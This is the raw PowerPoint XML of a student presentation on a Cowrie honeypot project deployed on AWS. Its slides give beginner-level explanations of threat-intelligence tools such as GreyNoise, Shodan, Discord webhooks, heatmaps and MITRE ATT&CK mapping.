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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
      <p:italic r:id="rId26"/>
      <p:boldItalic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="DM Sans" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="DM Sans Semi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428"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14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86.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.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89.sv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91.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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93.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97.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.pn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1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59.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60.sv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10.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.sv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13.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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5.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cowrie/cowrie.git" TargetMode="External"/><Relationship Id="rId12"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21.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.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sv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29.sv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svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.svg"/><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8.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26.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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0668" y="577572"/>
            <a:ext cx="4291846" cy="4291846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580668" y="4990743"/>
            <a:ext cx="4291846" cy="4291846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="563999"/>
            <a:ext cx="5825966" cy="465058"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PatriotPot Deception Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="1136809"/>
            <a:ext cx="3128367" cy="269677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>AWS Cowrie Honeypot Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="1514237"/>
            <a:ext cx="6602968" cy="172522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>George Mason University AIT670</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="1783794"/>
            <a:ext cx="6602968" cy="172522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Purpose: Hands-on Cowrie deployment training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="2053352"/>
            <a:ext cx="6602968" cy="172522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Presented by Team-Lead: Kevin Landr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="2333625"/>
            <a:ext cx="3055858" cy="269677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Let's all get on the same page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="2646402"/>
            <a:ext cx="2156936" cy="269677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>shall we…?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7454384" y="3037403"/>
            <a:ext cx="2995732" cy="7598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7357" y="818912"/>
            <a:ext cx="4210407" cy="439579"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat Intelligence Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757357" y="1539716"/>
            <a:ext cx="13115687" cy="224909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Our "Threat Intelligence Stack" is a set of tools and services we use to understand and react to cyber threats. Think of it like a detective's toolkit for the digital world.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757357" y="1922859"/>
            <a:ext cx="13115687" cy="449818"/>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First, let's understand APIs. An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>API (Application Programming Interface)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> is like a waiter in a restaurant. When our system needs specific information from another online service (like "what's the reputation of this IP address?"), the API acts as the messenger, sending our request and bringing back the answer. It lets different computer programs talk to each other safely and efficiently.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="110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57" y="2530912"/>
            <a:ext cx="351592" cy="351592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284684" y="2614374"/>
            <a:ext cx="1758315" cy="219789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>GreyNoise VIP API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284684" y="2918460"/>
            <a:ext cx="3727371" cy="2024182"/>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GreyNoise acts like a massive filter for internet activity. It helps us tell the difference between harmless background noise on the internet (like scanners from legitimate companies) and truly suspicious activity (like hackers actively looking for vulnerabilities). We use its API to quickly check if an IP address interacting with our honeypot is known to be 'bad' or just part of the internet's everyday traffic, helping us focus on real threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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7791" y="2530912"/>
            <a:ext cx="351592" cy="351592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715119" y="2614374"/>
            <a:ext cx="1758315" cy="219789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shodan API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715119" y="2918460"/>
            <a:ext cx="3727371" cy="1799273"/>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Shodan is often called "the search engine for the Internet of Things." It helps us discover devices connected to the internet and gather information about them, including their general location. By using Shodan, we can find out the geographical origin of the computers or attackers trying to connect to our honeypot. This helps us understand where cyber threats are coming from around the world.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="110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8226" y="2530912"/>
            <a:ext cx="351592" cy="351592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10145554" y="2614374"/>
            <a:ext cx="1758315" cy="219789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Discord webhooks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10145554" y="2918460"/>
            <a:ext cx="3727371" cy="1574363"/>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Webhooks are automated messages sent from apps when something specific happens. Discord is a popular chat application. When our honeypot detects something interesting or suspicious, a Discord webhook instantly sends an alert message to our team's chat channel. This gives us real-time notifications about potential threats, allowing us to react quickly to what's happening.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>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357" y="5223867"/>
            <a:ext cx="351592" cy="351592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284684" y="5307330"/>
            <a:ext cx="2293977" cy="219789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Daily automated heatmaps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284684" y="5611416"/>
            <a:ext cx="3727371" cy="1574363"/>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A heatmap is a visual way to show data using colors, where different colors represent different values (like how many attacks happened in a certain area). Every day, we create visual maps that show us where attacks are coming from most frequently across the globe. It's like a weather map for cyber threats, helping us quickly see patterns and identify "hot zones" of activity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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7791" y="5223867"/>
            <a:ext cx="351592" cy="351592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715119" y="5307330"/>
            <a:ext cx="2024301" cy="219789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715119" y="5611416"/>
            <a:ext cx="3727371" cy="1799273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK is like a common dictionary for cyber attackers' methods. It's a detailed list of the tactics (what they want to achieve), techniques (how they try to achieve it), and procedures (the specific steps they take) that hackers use. We categorize the attack methods observed by our honeypot according to this framework. This helps us understand how attackers operate, predict their next moves, and better defend against them.</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7335" y="463272"/>
            <a:ext cx="9684782" cy="340757"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>JSON Data Collection &amp; Analysis | .pcap conversion for Wireshark Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="1022152"/>
            <a:ext cx="1345572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Cowrie logs all attacker activity in structured JSON format for easy analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="1360170"/>
            <a:ext cx="3769043" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Real Attack Example (out of 60 +</a:t>
            </a:r>
            <a:r>
